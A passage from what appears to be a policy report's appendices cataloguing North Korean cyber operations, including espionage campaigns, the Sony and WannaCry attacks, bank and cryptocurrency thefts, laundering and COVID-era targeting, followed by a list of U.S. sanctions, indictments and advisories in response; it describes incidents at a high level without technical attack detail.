- Operation Desert Wolf targeted the U.S.–South Korean Combined Forces Command, South Korean Joint Chiefs of Staff, and the Defense Integrated Data Center where all South Korean defense information is stored. The hackers infected 3,200 computers and stole 235 gigabytes of classified information. They gained access to the U.S.–South Korean combined Operations Plan 5015 (OPLAN 5015) military strategy for responding to a North Korean invasion, including the decapitation plan to remove Kim Jong-un during wartime, and OPLAN 3100 for responding to North Korean commando attacks.
- North Korea hacked into the South Korean defense industry, stealing and subsequently deleting 42,000 documents, including designs for the F-15 wing and components of a reconnaissance satellite.
- Jamming operations targeting GPS navigation equipment at Seoul’s airports affected 962 planes.
- North Korea hacked dozens of top South Korean government officials’ smartphones and stole text messages and voice communications. Pyongyang also gained access to the Defense Minister’s personal computer the Defense Ministry’s intranet in order to extract military operations intelligence.
- North Korea gained entry into computers of Daewoo Shipbuilding & Marine Engineering Company and stole blueprints for South Korean warships, including information on the planned 3,000-ton submarine as well as its ballistic missile and vertical launch systems.
- North Korean hackers tried to infiltrate U.S. electric companies’ networks but did not compromise any of the industrial control systems that regulate the supply of power.
- The Kimsuky group conducted multi-year operations targeting the government; national security; aerospace and defense; experts on North Korea, nuclear policy, sanctions, and international relations; academia; and the media. These campaigns have included:
- Operation Baby Coin against experts on sanctions;
- Operation Baby Shark against U.S. national security think tanks for information related to Northeast Asia’s national security issues;
- Operation Kabar Cobra against the Ministry of Unification press corps;
- Operation Kitty Phishing against the Ministry of Unification press corps;
- Operation Red Salt against retired South Korean diplomatic, government, and military officials;
- Operation Stealth Power against U.S. and South Korean experts on North Korea;
- Operation Smoke Screen against U.S. experts on North Korea; and
- Operation Stolen Pencil against academic institutions.
- Operation Sharpshooter targeted 87 organizations in 24 countries in the communications, defense, energy, financial, health care, information technology, and infrastructure (energy, gas, nuclear, telecommunications, and transportation) sectors. The hackers masqueraded as job recruiters to induce targets to download infected documents. The recruiting companies, job listings, and recruiter profiles all appeared to be legitimate.
- Operation Ghost Secret was a data-theft campaign to gain intellectual property from companies in critical infrastructure, entertainment, finance, health care, higher education, and telecommunications sectors in 17 countries. The cyber campaign began by targeting a major Turkish government-controlled financial organization, followed by three additional financial institutions, before moving on to global targets.
- North Korea breached computers of the South Korean Ministry of Defense’s Defense Acquisition Program Administration and stole arms procurement plans, including plans for the country’s next-generation fighter aircraft.
- Several computer security firms reported links between North Korea and the Trickbot Group, an Eastern European cybercrime organization, to deploy malware in the first identified cyber collusion between North Korea and non-state actors.
- North Korean hackers breached the nuclear power plant in Kudankulam, India. The Kimsuky group was seeking proprietary information on thorium-based reactors. India is the leader in commercializing the use of thorium as a safer and more efficient alternative to uranium. The hackers also targeted several Indian nuclear physicists and scholars around the world who had published papers on thorium energy.
- North Korean hackers targeted phishing attacks against the French, South African, and Slovak ministries of foreign affairs, the U.K.’s Royal United Services Institute think tank, and the U.S. Congressional Research Service.
- The Lazarus group targeted defense industry organizations in at least a dozen countries through spear-phishing emails with malware attachments or links. The malware gathered sensitive information and gained access to the organizations’ restricted networks, which contained mission-critical assets as well as computers with highly sensitive data with no Internet access.
- North Korean hackers attacked Israel’s Ministry of Defense. The government claimed the intrusion was thwarted, but cybersecurity firm ClearSky assessed that the hackers penetrated the ministry’s computer system and stole a large amount of classified information in addition to infecting several dozen companies and organizations both in Israel and around the globe. A similar but less effective campaign targeted Israeli experts in 2019.
- North Korean cyber groups impersonated journalists and news outlets to seed false stories with other reporters to spread disinformation. The hackers used real emails gleaned from experts on North Korea to gain access to the computers of other foreign policy experts, North Korean defectors, and people interested in North Korean refugees. The attacks gained access to contact lists for surveillance and follow-on cyberattacks.
- The Kimsuky group engaged in spear-phishing campaigns against 28 U.N. officials, including six members of the U.N. Security Council. The emails contained malicious attachments or a link redirecting the victim to a site to steal usernames and passwords.
- The Lazarus group targeted cybersecurity experts in the U.S., Europe, and China by posing as researchers seeking to collaborate on cyber threat projects. The hackers created false identities on Twitter, Telegram, Keybase, LinkedIn, and Discord; created followers on those accounts; and populated websites with reports and articles to establish credibility.
- The Kimsuky group hacked into the Korea Atomic Energy Research Institute; Korea Aerospace Industries, a defense firm that is building the KF-21 fighter jet; and Daewoo Shipbuilding & Marine Engineering, which is building submarines and ships for the South Korean navy.
Phase Two: Cyberterrorism, Revenge Attacks, and Extortion
- Operation Blockbuster. North Korea conducted cyberattacks against and sent threatening messages to employees of Sony Pictures Entertainment to prevent the release of its film The Interview, which satirized Kim Jong-un. Pyongyang also threatened “merciless counter-measures” and “9/11-type attacks” against any U.S. theaters showing the film. The cyberattacks and accompanying threats of violent attack met the legal definition of international terrorism contained in the U.S. Code. The regime declared that the film was an “act of war” and had called on both U.N. Secretary General Ban Ki-moon and President Barack Obama to prevent its release. Sony and theater chains quickly withdrew the film, but the hackers still destroyed more than 3,000 computers and 800 servers; extracted the personal records, salary figures, and emails of 6,000 employees; and stole business records, several unreleased movies, and unfinished scripts that were posted on the Internet. Cancelling the film’s release cost Sony an estimated $100 million in lost revenue.
- Revenge Attacks Against Other “Anti-Kim” Film and TV Projects.
- As a result of the Sony hack and terrorist threats, New Regency announced that it would cancel production of a movie with Steve Carell that was to have been set in North Korea.
- North Korea similarly attacked Mammoth Screen, the production company for British Broadcaster Channel Four, which had announced plans for a 10-part television series Opposite Number about a British nuclear scientist kidnapped by North Korea. The cyberattack did not cause any damage, but the project was still cancelled.
- Korea Hydro and Nuclear Power Company. North Korea conducted a series of cyberattacks against South Korean nuclear facilities that led to the disclosure of blueprints for nuclear reactors and personal information of employees. The hackers demanded money and the shutting down of three reactors, threatening to destroy the nuclear facilities and warning nearby residents that it would “be a Fukushima” nuclear disaster. Korea Hydro and Nuclear Power Company, which controls South Korea’s nuclear power plants, reported that its computer systems were breached but that the reactor control systems were not breached.
- WannaCry was the largest ransomware attack in history, infecting more than 300,000 computers in more than 150 countries and causing more than $4 billion in damage. The attack crippled the United Kingdom’s National Health System, affecting one-third of hospitals providing intensive care and other emergency services and 8 percent of general medical practices. The ransomware demanded $300 in Bitcoin per victim, but because of a flaw in the code, only $140,000 in ransom was actually paid.
Phase Three: Cyber Bank Robbery
- An unidentified bank in Guatemala reported a loss of $16 million.
- In December, “having gained unauthorized access to [a] Vietnamese Bank’s computer network,” hackers “conducted false and fraudulent wire transfers totaling approximately €2 million to bank accounts in Slovenia and Bulgaria, and attempted to conduct fraudulent wire transfers of $3.4 million to Russia, A$1 million to Australia, and ¥90 million to Japan.”
- North Korea gained deep access to the computer network of the Bangladesh Bank (Bangladesh’s central bank) to steal approximately $81 million in fraudulent SWIFT transfers from the bank’s accounts in the Federal Reserve Bank of New York to illicit accounts in the Philippines, Sri Lanka, and other banks in Asia. A bank official noticed a typographical error and prevented an additional $851 million from being stolen. The U.S. Federal Reserve Bank authorized five of 35 fraudulent payments.
- $9 million was stolen from Ecuador’s Banco del Austro.
- $18 million was stolen from the Standard Bank of South Africa. The Japanese government stated that the hackers used forged cards with customer information stolen from the Standard Bank of South Africa to withdraw cash from approximately 1,700 ATMs in Tokyo and 16 prefectures across Japan.
- Union Bank of India thwarted a theft of $166 million. Hackers transferred money to banks in Cambodia, Thailand, Taiwan, and Australia, but authorities were able to recover the money.
- There was an attempt to steal approximately $104.1 million from an unidentified African bank to bank accounts in Taiwan, Thailand, and Cambodia.
- The South Korean online shopping mall Interpark was the target of a hack attack and blackmail of customer information. The National Police Agency reported that the hackers forced the transfer of $2.7 million.
- FASTCash Campaign. North Korean hacker groups stole tens of millions of dollars from bank ATMs in Africa and Asia. An attack in 2017 enabled cash withdrawals from ATMs in more than 30 countries, and a similar event in 2018 targeted banks in 23 countries. In 2018, the Cosmos Bank in India was targeted, enabling $13.5 million to be withdrawn in more than 14,000 simultaneous ATM withdrawals by “money mules” with cloned ATM cards in 28 countries as well as in additional transfers to an account belonging to a Hong Kong–based company using SWIFT transfers.
- An attempt was made to steal $60 million from a Tunisian bank.
- An attempt was made to steal approximately $60.1 million from the Far Eastern International Bank of Taiwan and transfer the money to bank accounts in Sri Lanka, Cambodia, and the United States. The bank recovered all but $500,000.
- Approximately $110 million was fraudulently transferred from Mexico’s Banco Nacional De Comercio Exterior (Bancomext) to bank accounts in the Republic of Korea.
- $10 million was transferred from the Banco de Chile to accounts in Hong Kong.
- Approximately $6.1 million was fraudulently withdrawn from BankIslami ATMs in Pakistan.
- An attempt was made to steal $19 million in Costa Rica.
- An attempt was made to steal $16.8 million from India’s City Union Bank.
- An attempt was made to steal $390 million using falsified SWIFT messages in Malaysia.
- An attempt was made to steal $32 million in Liberia.
- An attempt was made to transfer “approximately $6.4 million and €7.1 million [from Malta’s Bank of Valletta] to bank accounts in Hong Kong, the U.K., the United States, and the Czech Republic.” The funds were retrieved.
- There was an attempt to steal $10.8 million in Spain.
- There was an attempt to steal $12.2 million in The Gambia.
- In Nigeria, there was an attempt to steal $9.3 million.
- $49 million was stolen in Kuwait.
Phase Four: Cryptocurrency Exchanges
- Bithumb (South Korea) was attacked at least four times. Attacks in February and July 2017 netted $7 million or more each, and subsequent attacks in June 2018 and March 2019 netted $31 million and $20 million, respectively.
- Youbit (South Korea) suffered multiple attacks involving a $4.8 million loss in April 2017 and then 17 per cent of its overall assets in December 2017, forcing the exchange to file for bankruptcy.
- Monero (South Korea) lost $25,000 from cryptojacking.
- Coinis (South Korea) lost $2.19 million.
- NiceHash (Slovenia) lost more than $70 million.
- South Korean Cryptocurrency Company refused to pay a ransom of $16 million in cryptocurrency, so North Korean hackers released confidential customer information.
- North Korean hackers extorted approximately $2.3 million in cryptocurrency from Central American Online Casino 1 and approximately $361,500 in cryptocurrency from Central American Online Casino 2 to prevent the release of confidential customer information.
- In Operation AppleJeus, North Korean hackers created a fake cryptocurrency company to deliver malware by means of a disguised regular application update to targets in China, the U.K., Poland, and Russia. The virus enabled the attacker to gain full control of the users’ device and steal cryptocurrency.
- The theft of USD$13 million was reported in India.
- In Bangladesh, an attempt was made to steal $2.6 million.
- In Japan, Coincheck declared that $532 million was stolen.
- North Korean groups hacked into an unidentified digital currency exchange and stole nearly $250 million worth of digital currency. Two Chinese nationals who laundered the assets on behalf of the North Korean group received approximately $91 million (in addition to $9.5 million from a hack of another exchange).
- The Indonesian Cryptocurrency Company was victimized by the fraudulent transfers of approximately $24.9 million in cryptocurrency.
- Dragonex (Thailand, Singapore, and Hong Kong) reported the theft of $7 million.
- UpBit (South Korea) lost $49 million.
- The Lazarus Group stole $275 million from the KuCoin currency exchange. KuCoin’s CEO stated that the exchange recovered $204 million worth of the stolen funds.
- New York Financial Services Company lost approximately $11.8 million through fraudulent transfers of cryptocurrency.
Phase Five: Alternative Currencies and DeFis
After successfully hacking into a financial target, operatives must eventually convert cryptocurrency into real currency and launder it to avoid detection. Cybersecurity experts have identified North Korean hackers moving money through hundreds or thousands of separate transactions in numerous countries to launder it before cashing out.
In 2019, North Korea began to use decentralized finance (DeFi) platforms and decentralized cryptocurrency exchanges (DEX) to launder cryptocurrency. The Lazarus group’s use of DeFi platforms nearly doubled in 2020 as its use of mainstream cryptocurrency exchanges decreased. The shift reflects North Korea’s money-laundering adaptability in response to increasing security protocols or law enforcement focus on existing platforms. CipherTrace, a crypto intelligence company, assessed that cryptocurrency thefts and hacks declined in 2020 due to increased security procedures but that hacks against DeFis increased.
Phase Six: Pharmaceutical Companies
North Korea took advantage of the COVID-19 crisis to target pharmaceutical companies for proprietary information on vaccine production as well as individuals and businesses seeking COVID relief funding.
In 2020, the Lazarus group planned a large-scale phishing campaign against more than 5 million individuals and businesses in India, Japan, Singapore, South Korea, the U.K., and the United States. The hackers would pose as local authorities dispersing government COVID support funds and direct the targets to fake websites where they would divulge personal and financial information.
North Korean hackers targeted at least six pharmaceutical companies in the U.S., the U.K. and South Korea that were working on COVID treatments, including Johnson & Johnson, Novavax, AstraZeneca, Genexine, Shin Poong, and Celltrion. It was unclear whether North Korea was attempting to create its own vaccine or to sell obtained vaccine information to a foreign pharmaceutical company. In some cases, the hackers sent spear-phishing emails representing themselves as job recruiters or World Health Organization representatives.
The Lazarus group also targeted government agencies conducting COVID research, including the U.S. Department of Health and Human Services and the European Medicines Agency. The Kaspersky computer security company assessed that some computers at government agencies and companies had been breached.
In 2021, a member of the South Korean National Assembly asserted that intelligence reporting indicated that North Korea had targeted Pfizer to gain COVID vaccine information. It was uncertain whether the attack was successful.
Appendix 3: U.S. Government Responses to the North Korean Cyber Threat
In recent years, the U.S. government has issued numerous warning notices to highlight the growing danger of North Korean cyberattacks. The notices provide detailed technical information to enable companies and financial institutions to develop defensive responses. Washington also has issued indictments and imposed sanctions on North Korean individuals and entities in response to illicit cyber activities. Specifically:
- In 2014, the U.S. Treasury Department imposed sanctions on the Reconnaissance Guidance Bureau after the Sony hack.
- In 2016, the United States designated North Korea as a money-laundering concern, precluding it from accessing the U.S. financial system for international financial transactions.
- In September 2018, the Treasury Department’s Office of Foreign Assets Control (OFAC) and the Department of Justice sanctioned and unsealed criminal charges against Park Jin-hyok and the Chosun Expo Joint Venture for their involvement in the Sony hack, Bangladesh bank robbery, and WannaCry ransomware attack.
- In June 2019, the U.S. District Court for the District of Columbia affirmed the U.S. government’s authority under the Patriot Act to subpoena records from foreign banks with correspondent accounts in the United States as well as to cut off access by foreign banks to the U.S. financial system or dollar-denominated transactions. The ruling was in response to a Chinese company’s use of three Chinese banks to launder millions of dollars on behalf of North Korea’s sanctioned Foreign Trade Bank. The court ruling “caused a ripple effect throughout the Chinese financial sector. Stock prices for the three banks…plummeted shortly after the publication of the circuit court’s opinion.”
- In September 2019, OFAC announced sanctions against the Lazarus, Andariel, and Bluenoroff hacking groups for cyberattacks to support North Korea’s illicit nuclear and missile programs. The legal action blocks any property or interests of these entities in the United States. Any transactions by U.S. persons or foreign financial institutions using correspondent accounts in the United States would be subject to sanctions.
- In February 2020, the Pentagon, the FBI, and the Department of Homeland Security issued a series of messages warning of a North Korean cyber-espionage hacking campaign to “conduct illegal activity, steal funds & evade sanctions.”
- In March 2020, a grand jury indicted and the Treasury Department imposed sanctions on two Chinese nationals (Tian Yinyin and Li Jiadong) for laundering more than $100 million in cryptocurrency stolen by North Korean agents in a 2018 hack of a cyberexchange that netted $250 million. The individuals were also linked to a North Korean cybertheft of $48.5 million from a South Korean currency exchange in 2019.
- In May 2020, the Justice Department charged 28 North Korean and five Chinese individuals with laundering more than $2.5 billion in illegal payments for Pyongyang’s nuclear weapons and missile programs. The unsealed indictment accused the individuals of acting as agents of North Korea’s Foreign Trade Bank, the regime’s primary foreign currency bank and under U.S. sanctions for facilitating nuclear proliferation. The case was the largest U.S. sanctions violations case against North Korea and reveals the extent to which the United States believes China has assisted North Korea’s illicit network to evade international sanctions.
- In August 2020, the U.S. government warned of a North Korean group targeting government defense contractors to gather intelligence surrounding key military and energy technologies. The group used fake job postings from leading defense contractors as lures to install a data-gathering implant on the victim's system.
- In August 2020, the U.S. Department of Justice filed a civil complaint for forfeiture of 280 cryptocurrency accounts linked to North Korean hacking of two cryptocurrency exchanges in July 2019 and September 2019 that netted millions of dollars’ worth of cryptocurrency for the regime. “The complaint follows related criminal and civil actions announced in March 2020 pertaining to the theft of $250 million in cryptocurrency through other exchange hacks by North Korean actors” and “exposes the ongoing connections between North Korea’s cyber-hacking program and a Chinese cryptocurrency money laundering network.”
- In August 2020, the U.S. government issued a warning about the compromise of ATMs by the North Korean–linked BeagleBoyz and Operation FastCash. In February 2020, North Korea had resumed its targeting of banks in multiple countries for fraudulent international money transfers and ATM cashouts, ending “a lull in bank targeting since late 2019.” BeagleBoyz overlaps with other North Korean cyber groups and has been involved in attempts to steal nearly $2 billion at least since 2015.
- In September 2020, leaked U.S. government documents revealed that North Korea laundered $174.8 million in illicit funds from 2008 to 2017 through prominent U.S. banks in New York, including JP Morgan Chase and Bank of New York Mellon. The documents also showed that Chinese companies were involved.
- In October 2020, the U.S. government issued a warning alert on North Korean cyber group Kimsuky. The U.S. said the group was “engaged in ongoing cyber operations against worldwide targets to gain intelligence for North Korea, specifically on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.” The group specifically targets experts, think tanks, and government agencies in South Korea, Japan, and the United States.
- In February 2021, the U.S. government issued an alert about the Lazarus group’s targeting of individuals and companies, including cryptocurrency exchanges and financial service companies, with malware to steal cryptocurrency. Lazarus targeted cryptocurrency organizations in more than 30 countries during 2020 using cryptocurrency malware, referred to as AppleJeus. North Korea has used AppleJeus malware posing as cryptocurrency trading platforms since at least 2018. The malware appears to be from a legitimate cryptocurrency trading company to fool individuals into downloading it from what appears to be a legitimate website. Lazarus also uses phishing, social networking, and social engineering techniques to lure users into downloading the malware.
- In February 2021, the U.S. government unsealed a December 2020 indictment against three North Korean hackers (Jon Chang-hyok, Kim Il, and Park Jin-hyok) accused of committing a series of cyberattacks and attempting to steal or extort more than $1.3 billion worth of money and cryptocurrency from cyber heists and forced ATM cashouts. The case was an expansion of a 2018 case involving the Sony and WannaCry hacks. An accompanying case related to a Canadian-American citizen who pled guilty to money laundering.
- In March 2021, for the first time, the U.S. extradited a North Korean intelligence operative from overseas. Mun Chol-myong, affiliated with the Reconnaissance General Bureau, was accused of defrauding banks and laundering money through the U.S. financial system “in transactions valued at over $1.5 million” by using “a web of front companies and bank accounts registered to false names and remov[ing] references to [North Korea] from international wire transfer and transactional documents.”